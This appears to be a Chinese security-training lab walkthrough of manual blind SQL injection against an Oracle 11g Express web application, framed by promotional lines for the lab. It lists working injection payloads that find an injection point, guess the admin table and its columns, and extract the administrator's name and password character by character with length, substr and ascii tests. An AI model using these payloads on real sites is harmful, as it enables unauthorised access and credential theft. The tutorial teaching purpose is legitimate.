你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,点击获取免费靶场>>
Oracle数据库系统是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品。是目前世界上使用最为广泛的数据库管理系统。基于“客户端/服务器”模式结构,客户端应用程序与用户交互,接收用户信息,并向服务器发送请求,服务器系统负责管理数据信息和各种操作数据的活动。
Oracle数据库特征:
1)支持多用户、大事务量的处理
2)数据安全性和完整性的有效控制
3)支持分布式数据处理
4)移植性强
本次实验使用的是Oracle Database Express Edition 11g Release 2。
Sql注入形成的主要原因是:
由于程序员的安全意识薄弱,在编写代码时没有对用户输入的特殊字符进行处理,导致将特殊字符附带在参数中直接与数据库进行交互。
由于对and,select等关键字没有过滤。所以接下来我们可以使用and,select等构造sql语句来得到管理员帐号密码。
操作开始,我们先进入实验题目地址 Oracle手工盲注
实验步骤一
1.首先我们判断一下有没有注入点,在公司新闻下打开一个新闻链接
2.网址后加and 1=1返回正常
3.加and 1=2返回错误,说明存在注入漏洞。
4.判断一下数据库中的表,网址后加上:and (select count(*) from admin) <>0返回正常,说明存在admin表。如果返回错误,可将admin改为username、manager等常用表名继续猜解。
5.判断下该网站下有几个管理员,如果有多个的话,成功入侵的几率就会加大
and (select count(*) from admin)=1,返回正常说明只有一个管理员。
6.已知表的前提下,判断表中字段结构
and (select count(name) from admin)>=0返回正常,说明存在name字段
and (select count(pass) from admin)>=0返回错误,说明不存在pass字段
经过猜测,存在pwd字段,
实验步骤二
7.接下来采用ASCII码折半法猜解管理员帐号和密码
判断管理员帐号的长度
and (select count(*) from admin where length(name)>=5)=1
说明:length()函数用于求字符串的长度,此处猜测用户名的长度和5比较,即猜测是否由5个字符组成
8.and (select count(*) from admin where ascii(substr(name,1,1))>=97)=1
说明:substr()函数用于截取字符串,ascii()函数用于获取字符的ascii码,此处的意思是截取name字段的第一个字符,获取它的ascii码值,查询ascii码表可知97为字符a
and (select count(*) from admin where ascii(substr(name,2,1))>=100)=1 结果为100,即字符d,重复上述过程,可以判断出帐号为admin
9.相同方法猜解密码
and (select count(*) from admin where length(pwd)>=8)=1,返回正常,即密码长度为8,此时可以判断密码应该为明文
and (select count(*) from admin where ascii(substr(pwd,1,1))>=97)=1,返回正常,为字符a
and (select count(*) from admin where ascii(substr(pwd,2,1))>=100)=1,返回正常,为字符d
......重复操作......
and (select count(*) from admin where ascii(substr(pwd,8,1))>=56)=1,返回正常,为数字8
完成上述操作可以确定帐号为:admin密码为:admin888
打开http://10.1.1.59/login.jsp,输入猜解出的用户名和密码
提示登录成功
用实战磨练技术,加入网安实验室,1300+网安技能任你学!